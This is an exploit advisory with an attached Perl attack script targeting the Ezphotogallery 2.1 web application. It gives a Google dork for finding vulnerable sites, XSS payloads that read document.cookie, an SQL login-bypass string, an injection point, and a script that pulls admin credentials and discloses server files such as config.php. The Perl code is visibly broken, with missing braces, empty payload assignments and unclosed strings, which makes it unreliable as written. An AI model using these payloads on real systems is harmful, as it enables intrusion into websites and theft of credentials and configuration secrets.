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Ezphotogallery 2.1 Multiple Vulnerabilities ( Xss/Login Bypass/Sql injection Exploit/File Disclosure)

#Script : Ezphotogallery 2.1
#Type : Multiple Vulnerabilities ( Xss/Login Bypass/Sql injection Exploit/File 
#Method : GET
#Alert : High
#Google Dork : "100% | 50% | 25%" "Back to gallery" inurl:"show.php?imageid="
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#My Official Website : HTTP://FEREIDANI.IR
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR
#Script Download :  
#Xss Vulnerabilities :
#Xss 1 : gallery.php?galleryid=<script>alert(document.cookie)</script>
#Xss 2 : 
#Xss 3 : show.php?imageid=<script>alert(document.cookie)</script>
#Login Bypass :
#Insert in gallery.php
#User : admin ' or ' 1=1
#Password : Dr.Crash
#Sql Injection :
#Injection 1 : show.php?imageid=<sql>
#                        Tnx : God
#                     HTTP://IRCRASH.COM

use LWP;
use HTTP::Request;
use Getopt::Long;
$scriptname="Ezphotogallery 2.1";

sub header
print "
* $scriptname
*Discovered by : Khashayar Fereidani               *
*Exploited by : Khashayar Fereidani                *
*My Official Website : http://fereidani.ir         *
sub usage
  print "
* Usage : perl $0 http://Example/

$url = ($ARGV[0]);

if($url !~ /\//){$url = $url."/";}
if($url !~ /http:\/\//){$url = "http://".$url;}
sub xpl1()
$vul = 
$requestpage = $url.$vul;

my $req  = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/' );
$req->header("content-length" => $contlen);
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/<enduser>/,$name);
$name = @name[0];
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/<endpass>/,$password);
$password = @password[0];

if(!$name && !$password)
print "\n\n";
print "!Exploit failed ! :(\n\n";
print "\n Username: ".$name."\n\n";
print " Password: " .$password."\n\n";



sub xpl2()
print "\n Example For File Address : /home/user/public_html/config.php\n Or 
print "\n Enter File Address :";
$fil3 = <stdin>;

$vul = 
$requestpage = $url.$vul;
my $req  = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/' );
$req->header("content-length" => $contlen);
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();

@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/<enduser>/,$name);
$name = @name[0];

if(!$name && !$password)
print "\n\n";
print "!Exploit failed ! :(\n\n";
open (FILE, ">".source.".txt");
print FILE $name;
close (FILE);
print " File Save In source.txt\n";
print "";

print "
* $scriptname
*Discovered by : Khashayar Fereidani               *
*Exploited by : Khashayar Fereidani                *
*My Official Website : http://fereidani.ir         *
* Mod Options :                                    *
* Mod 1 : Find Script username and password        *
* Mod 2 : File Disclosure mode                     *
print "\n \n Enter Mod : ";
if ($mod=="1" or $mod=="2") { print "\n Exploiting .............. \n"; } else { 
print "\n Unknown Mod ! \n Exploit Failed !"; };
if ($mod=="1") { xpl1(); };
if ($mod=="2") { xpl2(); };